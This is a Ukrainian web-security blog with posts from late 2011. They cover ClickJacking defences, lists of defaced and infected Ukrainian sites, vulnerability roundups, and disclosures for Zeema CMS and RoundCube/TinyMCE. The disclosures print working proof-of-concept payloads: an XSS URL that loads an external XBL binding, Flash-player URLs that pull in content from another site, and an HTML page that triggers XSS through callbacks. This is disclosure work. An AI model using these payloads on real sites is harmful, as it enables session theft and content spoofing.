Методи захисту від ClickJacking

22:42 02.12.2011

Раніше я розповідав про методи захисту від ClickJacking в статті Заголовок X-Frame-Options, де розповів про один з таких методів. А зараз розповім про всі основні методи захисту від ClickJacking. Зазначу, що дані методи (з різною ефективністью) можуть також використовуватися для захисту від MouseOverJacking.

Існують наступні методи захисту від ClickJacking:

  • На стороні клієнта:
    • Ghostery
    • NoScript
    • GuardedID
    • Gazelle
  • На стороні сервера:
    • Framekiller (працює у всіх браузерах)
    • Заголовок X-Frame-Options (вимагає підтримки зі сторони браузера)

Якщо client-side методи вимагають наявності у користувача спеціального плагіна (Ghostery, NoScript чи GuardedID) або спеціального браузера (Gazelle) для захисту від ClickJacking, то server-side методи, зокрема Framekiller, цього не вимагають.

За виключенням заголовка X-Frame-Options. Який вимагає як наявності відповідного браузера (останні версії основних п’яти браузерів), так і необхідності веб розробникам і адмінам сайтів додавати його підтримку на сайтах (щоб сайти виводили даний заголовок), щоб захист спрацював у браузері користувача.

Похакані сайти №171

20:13 02.12.2011

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://www.sips.gov.ua (хакером Ma3sTr0-Dz) - 20.09.2011 - взломаний державний сайт, зараз сайт вже виправлений адмінами
  • http://www.sdip.gov.ua (хакером Ma3sTr0-Dz) - 20.09.2011 - взломаний державний сайт, зараз сайт вже виправлений адмінами
  • http://www.schule8.org.ua (хакером iskorpitx) - 10.08.2011, зараз сайт вже виправлений адмінами
  • http://webkolo.com (хакерами з RKH) - 11.08.2011, зараз сайт вже виправлений адмінами
  • http://larose.pp.ua (хакерами з RKH) - 11.08.2011, зараз сайт вже виправлений адмінами

Уразливості в Zeema CMS

17:27 02.12.2011

22.10.2011

У вересні, 12.09.2011, під час аудиту сайта свого клієнта, я знайшов Brute Force, Cross-Site Scripting та Full path disclosure уразливості в Zeema CMS (це українська комерційна CMS). Про що найближчим часом повідомлю розробникам.

Це частина з великої кількості уразливостей знайдених в даній CMS. Про інші дірки я розповім згодом. Всім користувачам даної системи вельми рекомендується провести аудит безпеки власних сайтів.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб системи.

02.12.2011

Brute Force:

http://site/cms/

XSS:

http://site/search/?query=%22%20style=%22-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml%23xss)

Атака спрацює в браузерах Mozilla і Firefox.

Full path disclosure:

http://site/search/?page=10&query=site

Уразливі всі версії Zeema CMS.

Низькорівневий пошук уразливостей у веб-додатках

22:43 01.12.2011

В статті PHP-дайвинг: низкоуровневый поиск уязвимостей в веб-приложениях розповідається про низькорівневий пошук уразливостей у веб-додатках, зокрема у PHP-додатках. Який автор статті назвав PHP-дайвінгом.

В даній статті розглянуті наступні аспекти пошуку уразливостей у PHP-додатках на низькому рівні:

  • Ціль дайвінгу.
  • Процес обробки веб-додатку PHP інтерпретатором.
  • Інструменти: Vulcan Logic Dumper (vld), bytekit та evalhook.
  • Приклади дайвінгу.
  • Додаткові техніки.

Пошук уразливостей у PHP-додатках на низькому рівні має свої переваги. Зокрема він може застосовуватися там, де не можна використати аналіз вихідних кодів (whitebox підхід) - при пошуку уразливостей в закритому коді PHP-програм.

П’ятий масовий взлом сайтів на сервері HostPro

20:33 01.12.2011

В серпні відбувся новий масовий взлом сайтів на сервері HostPro. Він тривав на протязі 2010 - 2011 років: 18.11.2010, 03.05.2011, 02.08.2011-03.08.2011 та 06.10.2011. Четвертий масовий взлом сайтів на сервері HostPro відбувся у цей же період.

Був взломаний сервер української компанії HostPro. Взлом складався з одного масового дефейса (65 сайтів) та трьох окремих дефейсів по одному сайту.

Всього було взломано 68 сайтів на сервері хостера HostPro (IP 194.28.85.14). Це наступні сайти: vitamon.in.ua, gameboykiev.com, www.gemmagee.com.ua, gtbs.com.ua, www.jemchyjina.lg.ua, www.mariphoto.com.ua, revcenter.com.ua, simvola.net, kap-center.com, lookaround.com.ua, linenofdesna.com, www.rapsoil.ua, sprgroup.com.ua, kaletin.com.ua, elvi.ua, okna-sbi.com.ua, pilotsunion.org.ua, mykomfort.com.ua, 5-s.com.ua, smirnov-auto-parts.com.ua, pidhrushna.te.ua, motorvent.com.ua, startup-az.com, www.starfrut.com.ua, edimvkusno.in.ua, stoness.info, summ.com.ua, akpp.vn.ua, www.starprint.com.ua, auto-fleet.com.ua, atm.zp.ua, www.ctgt.com.ua, technoimpuls.com.ua, suntruth.com.ua, auto-key.kiev.ua, tehmash.com, tiandeua.com, tmark.com.ua, tiens.ternopil.ua, www.tradeimport.com.ua, ukrainepoker.com.ua, www.ukrlog.com.ua, volksauto.com.ua, ukray.com.ua, vaibit.org, ulianarudich.com.ua, ukr-resins.com, www.urologist.kiev.ua, d-revival.com.ua, dt.crimea.ua, diogo.com.ua, dtg-electric.com, dom-tm.com.ua, don.biz.ua, donmet.com.ua, brooklyn-club.com.ua, billiard.co.ua, bpsbltd.com, actionlife.com.ua, artime.com.ua, atlant-otel.ru, ccroma.info, vostanovlenie.com.ua, trempel.tv, rynokukr.com.ua, ac.com.ua, www.zamok-markizy.kiev.ua, ekovka.com.ua.

З зазначених 68 сайтів 66 сайтів були взломані хакерами з RKH, 1 сайт хакером iskorpitx та 1 сайт хакером merci1994.

Окрім трьох окремих дефейсів по одному сайту, стосовно масового дефейсу сайтів можна сказати, що враховуючи велику кількість сайтів на одному сервері та короткий проміжок часу для дефейсу всіх цих сайтів, немає сумнівів, що вони були взломані через взлом серверу хостінг провайдера. Коли через взлом одного сайта, був отриманий root доступ до сервера (через уразливості в програмному забезпеченні самого сервера) та атаковані інші сайти на даному сервері. Або через використання уразливостей на сервері для доступу до інших сайтів.

Добірка уразливостей

17:29 01.12.2011

В даній добірці уразливості в веб додатках:

  • EMC Documentum eRoom arbitrary file upload vulnerability (деталі)
  • sNews 1.7.1 XSS vulnerability (деталі)
  • XSRF (CSRF) in Argyle Social (деталі)
  • Microsoft Security Bulletin MS10-051 - Critical Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution (деталі)
  • Multiple XSS (Cross Site Scripting) vulnerabilities in Argyle Social (деталі)
  • XSRF (CSRF) in Open Classifieds (деталі)
  • EMC SourceOne ASP.NET application tracing information disclosure vulnerability (деталі)
  • Multiple XSS flaws within Mitel’s AWC (Mitel Audio and Web Conferencing) (деталі)
  • Multiple XSS (Cross Site Scripting) vulnerabilities in PHP Calendar Basic (деталі)
  • Zeacom Chat Server JSESSIONID weak SessionID Vulnerability (деталі)

Недовірені сертифікати Digicert Sdn. Bhd.

22:48 30.11.2011

Виявлені недовірені сертифікати Digicert Sdn. Bhd.

Уразливі продукти: OpenSSL 0.9, OpenSSL 1.0.

Центром, що засвідчує, було видано кілька слабких сертифікатів.

Ситуація з цим видавцем сертифікатів подібна до інцидента з Comodo, що стався весною, та інцидента з DigiNotar, що стався влітку. Такі виробники браузерів як Mozilla та Microsoft вже анулювали сертифікати Digicert в своїх продуктах.

Інфіковані сайти №103

20:18 30.11.2011

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

  • http://ool.ua - інфекція була виявлена 16.11.2011. Зараз сайт не входить до переліку підозрілих.
  • http://aviso.ua - інфекція була виявлена 16.11.2011. Зараз сайт не входить до переліку підозрілих.
  • http://vrazrabotke.com.ua - інфекція була виявлена 30.11.2011. Зараз сайт входить до переліку підозрілих.
  • http://fn.ua - інфекція була виявлена 16.11.2011. Зараз сайт не входить до переліку підозрілих.
  • http://ukrdeftech.com.ua - інфекція була виявлена 19.11.2011. Зараз сайт не входить до переліку підозрілих.

Численні уразливості в RoundCube

17:20 30.11.2011

18.10.2011

В жовтні, 12.10.2011, а також додатково 15.10.2011, я знайшов численні уразливості в RoundCube. Це Brute Force, Content Spoofing, Cross-Site Scripting та Clickjacking уразливості. Частина з цих дірок - це уразливості в TinyMCE, що постачається з RoundCube. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.

30.11.2011

Brute Force:

http://site/index.php

Content Spoofing:

Можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті.

http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv
http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?autoStart=false&startImage=http://site2/1.jpg
http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv&autoStart=false&startImage=http://site2/1.jpg
http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.xml

Через xml-файл, розміщений на поточному чи зовнішньому ресурсі, можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті (параметри thumbnail та url в xml-файлі приймають довільні адреси).

Файл 1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<playlist>
	<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>
	<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>
</playlist>

XSS:

<html>
<body>
<script>
function flvStart() {
	alert('XSS');
}
function flvEnd() {
	alert('XSS');
}
</script>
<object width="50%" height="50%">
<param name=movie value="flv_player.swf?flvToPlay=1.flv&jsCallback=true">
<param name=quality value=high>
<embed src="flv_player.swf?flvToPlay=1.flv&jsCallback=true" width="50%" height="50%" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash"></embed>
</object>
</body>
</html>

Якщо на сайті на сторінці з flv_player.swf (з параметром jsCallback=true, або якщо є можливість вказати цей параметр для flv_player.swf) є можливість включити JS код з функцією flvStart() і/або flvEnd() (через HTML Injection), то можна провести XSS атаку. Тобто JS-калбеки можна використати для XSS атаки.

Content Spoofing:

http://site/program/js/tiny_mce/plugins/media/moxieplayer.swf?url=http://site2/1.flv

Можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті.

Clickjacking:

RoundCube вразливий до віддаленого логіну з використанням Clickjacking. Про дані атаки я вже розповідав в своїй статті.

В версії RoundCube 0.6-RC доданий захист от Clickjacking атак (окрім вищезгаданої форми логіну), до якого вразливий весь функціонал додатку. Але захист недостатньо ефективний, так як спрацьовує лише в нових версіях деяких браузерів, тому користувачі старих браузерів будуть незищені. Ну, а старі версії RoundCube повністю вразливі до Clickjacking.

CS та XSS - це уразливості в TinyMCE.

Уразливі RoundCube 0.6 та попередні версії (перевірялося в 0.4-beta та 0.6). В останній версії RoundCube 0.6 використовує moxieplayer.swf (замість flv_player.swf). Як повідомили мені розробники, в версії RoundCube 0.7 уразливості будуть виправлені.

Уразливості в плагінах для WordPress №53

23:56 29.11.2011

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Zingiri Web Shop, Lanoba Social та advanced-text-widget. Для котрих з’явилися експлоіти. Zingiri Web Shop - це плагін для створення онлайн магазина, Lanoba Social - це плагін для інтеграції з соціальними мережами (такими як Facebook, Twitter та іншими), advanced-text-widget - це текстовий віджет з розширеними можливостями для розміщення контенту.

  • Wordpress Zingiri Web Shop Plugin <= 2.2.3 Remote Code Execution Vulnerability (деталі)
  • wordpress Lanoba Social Plugin Xss Vulnerabilities (деталі)
  • Wordpress advanced-text-widget Plugin Vulnerabilities (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.